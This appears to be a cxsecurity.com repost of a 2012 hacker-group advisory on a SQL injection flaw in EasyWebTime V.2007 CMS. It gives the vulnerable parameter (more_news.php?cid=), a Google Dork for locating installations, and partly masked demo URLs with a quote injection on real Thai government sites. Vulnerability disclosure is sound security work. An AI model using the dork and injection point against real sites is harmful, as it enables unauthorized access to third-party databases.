EasyWebTime V.2007 CMS SQL Injection

2012.09.11
Credit: Crim3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ M3Mb3R OF AjaxTm --> ############################################################################ # Exploit Title: EasyWebTime V.2007 CMS sql injection # Google Dork: "Powered by EasyWebTime V.2007" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.bizpotential.com/main.php?filename=easywebtime # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ###### ================================== sqli [+] more_news.php?cid=[id][sqli]&filename=[filename] D3m0: http://nakhXXXanom.cad.go.th/more_news.php?cid=1%27&filename=index2 http://regioXXd.go.th/more_news.php?cid=1'&filename=index2011 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369

References:

http://www.bizpotential.com/main.php?filename=easywebtime
http://cxsecurity.com/issue/WLB-2012070186


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top